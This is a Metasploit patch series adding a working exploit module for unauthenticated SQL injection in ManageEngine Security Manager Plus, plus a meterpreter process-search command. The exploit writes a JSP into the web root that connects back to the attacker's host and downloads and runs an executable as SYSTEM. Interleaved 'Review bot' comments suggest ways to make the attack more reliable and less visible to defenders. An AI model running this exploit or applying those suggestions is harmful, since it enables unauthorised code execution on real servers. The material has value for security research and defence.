- # - def on_new_session(cli) - if cli.type != 'meterpreter' - print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") - return - end - - cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") - - begin - # jsp = @outpath.gsub(/\//, "\\\\") - # jsp = jsp.gsub(/"/, "") - vprint_status("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") - cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") - print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") - rescue ::Exception => e - print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") - end - end - - - # - # Transfer the malicious executable to our victim - # - def on_client_connect(cli) - print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") - cli.put(@native_payload) - service.close_client(cli) - end - - - # - # Generate a download+exe JSP payload - # - def generate_jsp_payload - my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] - my_port = datastore['SRVPORT'] - - # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\ - # This will download our malicious executable in base64 format, decode it back, - # save it as a temp file, and then finally execute it. 
- jsp = %Q| - <%@page import="java.io.*"%> - <%@page import="java.net.*"%> - <%@page import="sun.misc.BASE64Decoder"%> - - <% - StringBuffer buf = new StringBuffer(); - byte[] shellcode = null; - BufferedOutputStream outstream = null; - try { - Socket s = new Socket("#{my_host}", #{my_port}); - BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); - while (buf.length() < #{@native_payload.length}) { - buf.append( (char) r.read()); - } - - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); - - File temp = File.createTempFile("#{@native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); - - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); - - Process p = Runtime.getRuntime().exec(path); - } catch (Exception e) {} - %> - | - - jsp = jsp.gsub(/\n/, '') - jsp = jsp.gsub(/\t/, '') - - jsp.unpack("H*")[0] - end - - - # - # Run the actual exploit - # - def inject_exec - # This little lag is meant to ensure the TCP server runs first before the requests - select(nil, nil, nil, 1) - - # Inject our JSP payload - print_status("#{rhost}:#{rport} - Sending JSP payload") - pass = rand_text_alpha(rand(10)+5) - hex_jsp = generate_jsp_payload - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', - 'headers' => { - 'Cookie' => 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 
2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;', - 'Accept-Encoding' => 'identity' - }, - 'vars_post' => { - 'ANDOR' => 'and', - 'condition_1' => 'OpenPorts@PORT', - 'operator_1' => 'IN', - 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", - 'COUNT' => '1' - } - }) - - print_status("#{rhost}:#{rport} - Sending pwnage /#{@jsp_name + '.jsp'}") - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{@jsp_name + '.jsp'}", - 'headers' => { - 'Cookie' => 'pwnage' - } - }) - - handler - end - - - # - # The server must start first, and then we send the malicious requests - # - def exploit - # Avoid passing this as an argument for performance reasons - # This is in base64 is make sure our file isn't mangled - @native_payload = [generate_payload_exe].pack("m*") - @native_payload_name = rand_text_alpha(rand(6)+3) - @jsp_name = rand_text_alpha(rand(6)+3) - @outpath = "\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" - - begin - t = framework.threads.spawn("reqs", false) { inject_exec } - print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") - super - ensure - t.kill - end - end -end \ No newline at end of file diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb new file mode 100644 index 0000000000..064c335731 --- /dev/null +++ b/modules/exploits/windows/http/manage_engine_sqli.rb 
@@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "ManageEngine Security Manager Plus 5.5 build 5505 SQL Injection", + 'Description' => %q{ + This module exploits a SQL injection found in ManageEngine Security Manager Plus + advanced search page. It will send a malicious SQL query to create a JSP file + under the web root directory, and then let it download and execute our malicious + executable under the context of SYSTEM. No authentication is necessary to exploit this. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence' # Discovery & Metasploit module + ], + 'References' => + [ + ['EDB','22094'] + ], + 'Platform' => 'win', + 'Targets' => + [ + # Win XP / 2003 / Vista / Win 7 / etc + ['Windows Universal', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 18 2012", + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('RPORT', [true, 'The target port', 6262]) + ], self.class) + end + + + # + # A very gentle check to see if Security Manager Plus exists or not + # + def check + res = send_request_raw({ + 'method' => 'GET', + 'uri' => '/SecurityManager.cc' + }) + + if res and res.body =~ /\Security Manager Plus\<\/title\>/ + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + # + # Remove the JSP once we get a shell. + # We cannot delete the executable because it will still be in use. + # + def on_new_session(cli) + if cli.type != 'meterpreter' + print_error("Meterpreter not used. 
Please manually remove #{@jsp_name + '.jsp'}") + return + end + + cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") + + begin + print_warning("#{rhost}:#{rport} - Deleting: #{@jsp_name + '.jsp'}") + cli.fs.file.rm("../webapps/SecurityManager/#{@jsp_name + '.jsp'}") + print_good("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted") + rescue ::Exception => e + print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}") + end + end + + + # + # Transfer the malicious executable to our victim + # + def on_client_connect(cli) + print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)") + cli.put(@native_payload) + service.close_client(cli) + end + + + # + # Generate a download+exe JSP payload + # + def generate_jsp_payload + my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] + my_port = datastore['SRVPORT'] + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="java.net.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + + <% + StringBuffer buf = new StringBuffer(); + byte[] shellcode = null; + BufferedOutputStream outstream = null; + try { + Socket s = new Socket("#{my_host}", #{my_port}); + BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); + while (buf.length() < #{@native_payload.length}) { + buf.append( (char) r.read()); + } + + BASE64Decoder decoder = new BASE64Decoder(); + shellcode = decoder.decodeBuffer(buf.toString()); + + File temp = File.createTempFile("#{@native_payload_name}", ".exe"); + String path = temp.getAbsolutePath(); + + outstream = new BufferedOutputStream(new FileOutputStream(path)); + outstream.write(shellcode); + outstream.close(); + + Process p = Runtime.getRuntime().exec(path); + } catch (Exception e) {} + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + + jsp.unpack("H*")[0] + end + + + # + # Run the actual exploit + # + def inject_exec + # This little lag is 
meant to ensure the TCP server runs first before the requests + select(nil, nil, nil, 1) + + # Inject our JSP payload + print_status("#{rhost}:#{rport} - Sending JSP payload") + pass = rand_text_alpha(rand(10)+5) + hex_jsp = generate_jsp_payload + + cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;' + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'headers' => { + 'Cookie' => cookie, + 'Accept-Encoding' => 'identity' + }, + 'vars_post' => { + 'ANDOR' => 'and', + 'condition_1' => 'OpenPorts@PORT', + 'operator_1' => 'IN', + 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'COUNT' => '1' + } + }) + + print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "/#{@jsp_name + '.jsp'}", + 'headers' => { + 'Cookie' => 'pwnage' + } + }) + + handler + end + + + # + # The server must start first, and then we send the malicious requests + # + def exploit + # Avoid passing this as an argument for performance reasons + # This is in base64 is make sure our file isn't mangled + @native_payload = [generate_payload_exe].pack("m*") + @native_payload_name = rand_text_alpha(rand(6)+3) + @jsp_name = rand_text_alpha(rand(6)+3) + @outpath = 
"\"../../webapps/SecurityManager/#{@jsp_name + '.jsp'}\"" + + begin + t = framework.threads.spawn("reqs", false) { inject_exec } + print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}") + super + ensure + t.kill + end + end +end \ No newline at end of file From 669d22c917926e0a7576ea5c11f069cbdb028979 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 02:05:08 -0500 Subject: [PATCH 10/74] Final improvements --- .../windows/http/manage_engine_sqli.rb | 95 +++++++++++-------- 1 file changed, 58 insertions(+), 37 deletions(-) diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manage_engine_sqli.rb index 064c335731..7d22cb3ab0 100644 --- a/modules/exploits/windows/http/manage_engine_sqli.rb +++ b/modules/exploits/windows/http/manage_engine_sqli.rb @@ -21,21 +21,23 @@ class Metasploit3 < Msf::Exploit::Remote This module exploits a SQL injection found in ManageEngine Security Manager Plus advanced search page. It will send a malicious SQL query to create a JSP file under the web root directory, and then let it download and execute our malicious - executable under the context of SYSTEM. No authentication is necessary to exploit this. + executable under the context of SYSTEM. Authentication is not required in order + to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ - 'xistence' # Discovery & Metasploit module + 'xistence ', # Discovery & Metasploit module + 'sinn3r' # Improved Metasploit module ], 'References' => [ - ['EDB','22094'] + ['EDB','22094'], + ['BID', '56138'] ], 'Platform' => 'win', 'Targets' => [ - # Win XP / 2003 / Vista / Win 7 / etc ['Windows Universal', {}] ], 'Privileged' => false, 
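Review bot: The new module declares `'Privileged' => false` while its description states the payload runs "under the context of SYSTEM"; Metasploit uses `Privileged` to mark exploits that yield a privileged session, so one of the two is wrong — set `'Privileged' => true` if the ManageEngine service really runs as SYSTEM, or drop the claim from the description. In `inject_exec`, `pass = rand_text_alpha(rand(10)+5)` is assigned and never used and should be removed. The trigger request also sends `'Cookie' => 'pwnage'`, which has no functional role and only leaves a fixed string for defenders to alert on; the default headers are sufficient.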
@@ -53,12 +55,9 @@ class Metasploit3 < Msf::Exploit::Remote # A very gentle check to see if Security Manager Plus exists or not # def check - res = send_request_raw({ - 'method' => 'GET', - 'uri' => '/SecurityManager.cc' - }) + res = send_request_raw({'uri' => '/SecurityManager.cc'}) - if res and res.body =~ /\Security Manager Plus\<\/title\>/ + if res and res.body =~ /\SecurityManager Plus\<\/title\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe @@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote # def on_new_session(cli) if cli.type != 'meterpreter' - print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") + print_warning("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}") return end 
@@ -105,33 +104,43 @@ class Metasploit3 < Msf::Exploit::Remote my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST'] my_port = datastore['SRVPORT'] + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_shellcode = Rex::Text.rand_text_alpha(rand(8) + 3) + var_outstream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_socket = Rex::Text.rand_text_alpha(rand(8) + 3) + var_bufreader = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_temp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc = Rex::Text.rand_text_alpha(rand(8) + 3) + jsp = %Q| <%@page import="java.io.*"%> <%@page import="java.net.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% - StringBuffer buf = new StringBuffer(); - byte[] shellcode = null; - BufferedOutputStream outstream = null; + StringBuffer #{var_buf} = new StringBuffer(); + byte[] #{var_shellcode} = null; + BufferedOutputStream #{var_outstream} = null; try { - Socket s = new Socket("#{my_host}", #{my_port}); - BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream())); - while (buf.length() < #{@native_payload.length}) { - buf.append( (char) r.read()); + Socket #{var_socket} = new Socket("#{my_host}", #{my_port}); + BufferedReader #{var_bufreader} = new BufferedReader(new InputStreamReader(#{var_socket}.getInputStream())); + while (#{var_buf}.length() < #{@native_payload.length}) { + #{var_buf}.append( (char) #{var_bufreader}.read()); } - BASE64Decoder decoder = new BASE64Decoder(); - shellcode = decoder.decodeBuffer(buf.toString()); + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + #{var_shellcode} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); - File temp = File.createTempFile("#{@native_payload_name}", ".exe"); - String path = temp.getAbsolutePath(); + File #{var_temp} = File.createTempFile("#{@native_payload_name}", ".exe"); + String #{var_path} 
= #{var_temp}.getAbsolutePath(); - outstream = new BufferedOutputStream(new FileOutputStream(path)); - outstream.write(shellcode); - outstream.close(); + #{var_outstream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_outstream}.write(#{var_shellcode}); + #{var_outstream}.close(); - Process p = Runtime.getRuntime().exec(path); + Process #{var_proc} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) {} %> | 
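Review bot: The download loop in the generated JSP appends `(char) read()` without checking for end of stream, so if the TCP server closes early the loop pads the buffer with `'\uFFFF'` until the expected length is reached, the decoder then sees garbage, and whatever it throws is swallowed by the empty `catch (Exception e) {}`; read into an int first, `int c = #{var_bufreader}.read(); if (c < 0) break; #{var_buf}.append((char) c);`. Separately, the nine identifiers drawn with `Rex::Text.rand_text_alpha(rand(8) + 3)` are independent, so two can (rarely) collide and a lowercase 3-letter draw can land on a Java keyword such as `int` or `try`, either of which makes the JSP fail to compile; drawing them into one array and redrawing until `names.uniq.size == names.size` (and none is a reserved word) removes the flake. `generate_jsp_payload` starts above this hunk.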
@@ -151,36 +160,48 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 1) # Inject our JSP payload - print_status("#{rhost}:#{rport} - Sending JSP payload") - pass = rand_text_alpha(rand(10)+5) hex_jsp = generate_jsp_payload - cookie = 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;' + cookie = 'STATE_COOKIE=&' + cookie << 'SecurityManager/ID/174/HomePageSubDAC_LIST/223/SecurityManager_CONTENTAREA_LIST/226/MainDAC_LIST/166&' + cookie << 'MainTabs/ID/167/_PV/174/selectedView/Home&' + cookie << 'Home/ID/166/PDCA/MainDAC/_PV/174&' + cookie << 'HomePageSub/ID/226/PDCA/SecurityManager_CONTENTAREA/_PV/166&' + cookie << 'HomePageSubTab/ID/225/_PV/226/selectedView/HomePageSecurity&' + cookie << 'HomePageSecurity/ID/223/PDCA/HomePageSubDAC/_PV/226&' + cookie << '_REQS/_RVID/SecurityManager/_TIME/31337; ' + cookie << '2RequestsshowThreadedReq=showThreadedReqshow; ' + cookie << '2RequestshideThreadedReq=hideThreadedReqhide;' + rnd_num = Rex::Text.rand_text_numeric(1) + sqli = "#{rnd_num})) union select 0x#{hex_jsp}," + sqli << (2..28).map {|e| e} * "," + sqli << " into outfile #{@outpath} FROM mysql.user WHERE #{rnd_num}=((#{rnd_num}" + + state_id = Rex::Text.rand_text_numeric(5) + print_status("#{rhost}:#{rport} - Sending JSP payload") res = send_request_cgi({ 'method' => 'POST', - 'uri' => '/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP', + 'uri' => 
"/STATE_ID/#{state_id}/jsp/xmlhttp/persistence.jsp", 'headers' => { 'Cookie' => cookie, 'Accept-Encoding' => 'identity' }, + 'vars_get' => { + 'reqType' =>'AdvanceSearch', + 'SUBREQUEST' =>'XMLHTTP' + }, 'vars_post' => { 'ANDOR' => 'and', 'condition_1' => 'OpenPorts@PORT', 'operator_1' => 'IN', - 'value_1' => "1)) union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 into outfile #{@outpath} FROM mysql.user WHERE 1=((1", + 'value_1' => sqli, 'COUNT' => '1' } }) print_status("#{rhost}:#{rport} - Sending /#{@jsp_name + '.jsp'}") - res = send_request_raw({ - 'method' => 'GET', - 'uri' => "/#{@jsp_name + '.jsp'}", - 'headers' => { - 'Cookie' => 'pwnage' - } - }) + send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"}) handler end From e5ec51a78091ecf6b1c2e54e337cb0a823dca057 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 23 Oct 2012 02:05:55 -0500 Subject: [PATCH 11/74] Rename file for consistency --- .../http/{manage_engine_sqli.rb => manageengine_search_sqli.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/exploits/windows/http/{manage_engine_sqli.rb => manageengine_search_sqli.rb} (100%) diff --git a/modules/exploits/windows/http/manage_engine_sqli.rb b/modules/exploits/windows/http/manageengine_search_sqli.rb similarity index 100% rename from modules/exploits/windows/http/manage_engine_sqli.rb rename to modules/exploits/windows/http/manageengine_search_sqli.rb From ef29f29c100138267dd7158d6ccd483b6f2c9ec8 Mon Sep 17 00:00:00 2001 
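Review bot: Both HTTP responses in `inject_exec` are still ignored on the new side: `res` from the injection POST is assigned and never read, and the return value of `send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"})` is dropped, so a failed `INTO OUTFILE` (missing FILE privilege, wrong relative base for `@outpath`) goes straight to `handler` with no diagnostic. Capture the JSP request's response and stop when it is not a 200, e.g. `res = send_request_raw({'uri' => "/#{@jsp_name + '.jsp'}"})` followed by `unless res and res.code == 200` / `print_error("#{rhost}:#{rport} - JSP not found, injection probably failed"); return` / `end`. Also `sqli << (2..28).map {|e| e} * ","` is an identity map followed by `Array#*`; `sqli << (2..28).to_a.join(",")` says the same thing directly. `inject_exec` begins above this hunk.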
From: David Maloney Date: Wed, 29 Aug 2012 19:16:33 -0500 Subject: [PATCH 12/74] Adds a new findpids command to meterpreter findpids calls client.sys.process.get_processes like ps but then filters out any processes that do not match one of the process names supplied as arguments to the command. `findpids explorer.exe notepad.exe` will return all processes named explorer.exe or notepad.exe Allows for quick searching for the pid you want. ideal for migration --- .../console/command_dispatcher/stdapi/sys.rb | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 138ea2eaab..4ce46c0e50 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -58,6 +58,7 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => "Get the user that the server is running as", "kill" => "Terminate a process", "ps" => "List running processes", + "findpids" => "Find Processes by name", "reboot" => "Reboots the remote computer", "reg" => "Modify and interact with the remote registry", "rev2self" => "Calls RevertToSelf() on the remote machine", @@ -75,6 +76,7 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => [ "stdapi_sys_config_getuid" ], "kill" => [ "stdapi_sys_process_kill" ], "ps" => [ "stdapi_sys_process_get_processes" ], + "findpids" => [ "stdapi_sys_process_get_processes" ], "reboot" => [ "stdapi_sys_power_exitwindows" ], "reg" => [ "stdapi_registry_load_key", 
@@ -284,6 +286,34 @@ class Console::CommandDispatcher::Stdapi::Sys return true end + def cmd_findpids(*args) + if args.empty? or args.include? "-h" + print_line "You must supply one or more process name to search for" + print_line "e.g. findpids explorer.exe notepad.exe" + return true + end + processes = client.sys.process.get_processes + if (processes.length == 0) + print_line("No running processes were found.") + else + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if args.include? proc["name"] + searched_procs << proc + end + end + searched_procs.compact! + if searched_procs.length == 0 + print_line("No running processes were found matching the supplied names.") + else + print_line + print_line(searched_procs.to_table("Indent" => 1).to_s) + print_line + end + end + return true + end + # # Reboots the remote computer. # From f13502033af2d7eb38777537b2bf1ff6ee31d4f6 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 6 Sep 2012 11:54:28 -0500 Subject: [PATCH 13/74] Built in regex support to findpids --- .../ui/console/command_dispatcher/stdapi/sys.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 4ce46c0e50..26e8ac17cd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -290,6 +290,7 @@ class Console::CommandDispatcher::Stdapi::Sys if args.empty? or args.include? "-h" print_line "You must supply one or more process name to search for" print_line "e.g. findpids explorer.exe notepad.exe" + print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" return true end processes = client.sys.process.get_processes 
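Review bot: `args.include? proc["name"]` in the new `cmd_findpids` is an exact, case-sensitive comparison, but Windows process names are case-insensitive and can be reported with varying case (e.g. `Explorer.EXE` on some hosts), so `findpids explorer.exe` can miss the very process the help text advertises. Lowercase both sides once: `wanted = args.map(&:downcase)` before the loop and `searched_procs << proc if wanted.include?(proc["name"].to_s.downcase)` inside it, where `.to_s` also tolerates a missing name. The `searched_procs.compact!` call is unnecessary since only non-nil `proc` entries are ever appended.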
@@ -298,8 +299,11 @@ class Console::CommandDispatcher::Stdapi::Sys else searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new processes.each do |proc| - if args.include? proc["name"] - searched_procs << proc + args.each do |arg| + if proc["name"].match(/#{arg}/) + searched_procs << proc + break + end end end searched_procs.compact! From 52f3dfa81b4a2aa0d8c2d0f52fe25e9a381e6ae1 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Wed, 12 Sep 2012 08:26:31 -0500 Subject: [PATCH 14/74] Moved help text into cmd_findpids_help --- .../ui/console/command_dispatcher/stdapi/sys.rb | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 26e8ac17cd..52e26561d1 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -288,9 +288,7 @@ class Console::CommandDispatcher::Stdapi::Sys def cmd_findpids(*args) if args.empty? or args.include? "-h" - print_line "You must supply one or more process name to search for" - print_line "e.g. findpids explorer.exe notepad.exe" - print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + cmd_findpids_help return true end processes = client.sys.process.get_processes @@ -318,6 +316,12 @@ class Console::CommandDispatcher::Stdapi::Sys return true end + def cmd_findpids_help + print_line "You must supply one or more process name to search for" + print_line "e.g. findpids explorer.exe notepad.exe" + print_line "You may also pass Regular Expressions: findpids *.svc.* *.dll.*" + end + # # Reboots the remote computer. # From 1adfc0e070c302a2d39bc33ab1da5f0560fedb33 Mon Sep 17 00:00:00 2001 
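Review bot: `proc["name"].match(/#{arg}/)` interpolates each user-supplied argument into a regex unescaped, so a malformed pattern raises `RegexpError` out of the command instead of printing an error — and the help text added in this patch recommends exactly such a pattern, `findpids *.svc.* *.dll.*`, because a leading `*` has no repeat target (`.*svc.*` or plain `svc` was meant). The patterns are also recompiled for every process × argument pair, and a nil name would raise `NoMethodError`. Compile each argument once before the loop, report bad ones, and match against `proc["name"].to_s`. `cmd_findpids` begins and ends outside this hunk.
```ruby
searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new
patterns = args.map do |arg|
  begin
    Regexp.new(arg)
  rescue RegexpError => e
    print_line "Invalid regular expression '#{arg}': #{e.message}"
    return true
  end
end
processes.each do |proc|
  searched_procs << proc if patterns.any? { |re| re.match(proc["name"].to_s) }
end
# … unchanged: compact!, empty-result message, table output …
```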
From: David Maloney Date: Wed, 19 Sep 2012 08:28:36 -0500 Subject: [PATCH 15/74] rolled changes into existing ps command Some users requested this be added to the ps command via a -S opt instead of creating a new command. This limits the search to only one search parameter at a time but with the ability to pass RegEx I think that's fine --- .../console/command_dispatcher/stdapi/sys.rb | 66 +++++++++---------- 1 file changed, 30 insertions(+), 36 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb index 52e26561d1..f3683f980a 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb @@ -45,6 +45,10 @@ class Console::CommandDispatcher::Stdapi::Sys "-r" => [ true, "The remote machine name to connect to (with current process credentials" ], "-w" => [ false, "Set KEY_WOW64 flag, valid values [32|64]." ]) + @@ps_opts = Rex::Parser::Arguments.new( + "-h" => [false, "Help menu."], + "-S" => [true, "RegEx term(s) to filter results with "]) + # # List of supported commands. # @@ -58,7 +62,6 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => "Get the user that the server is running as", "kill" => "Terminate a process", "ps" => "List running processes", - "findpids" => "Find Processes by name", "reboot" => "Reboots the remote computer", "reg" => "Modify and interact with the remote registry", "rev2self" => "Calls RevertToSelf() on the remote machine", @@ -76,7 +79,6 @@ class Console::CommandDispatcher::Stdapi::Sys "getuid" => [ "stdapi_sys_config_getuid" ], "kill" => [ "stdapi_sys_process_kill" ], "ps" => [ "stdapi_sys_process_get_processes" ], - "findpids" => [ "stdapi_sys_process_get_processes" ], "reboot" => [ "stdapi_sys_power_exitwindows" ], "reg" => [ "stdapi_registry_load_key", 
@@ -276,6 +278,24 @@ class Console::CommandDispatcher::Stdapi::Sys # def cmd_ps(*args) processes = client.sys.process.get_processes + @@ps_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_ps_help + return true + when "-S" + print_line "Performing Search..." + searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new + processes.each do |proc| + if val.nil? or val.empty? + print_line "You must supply a search term!" + return false + end + searched_procs << proc if proc["name"].match(/#{val}/) + end + processes = searched_procs + end + end if (processes.length == 0) print_line("No running processes were found.") else 
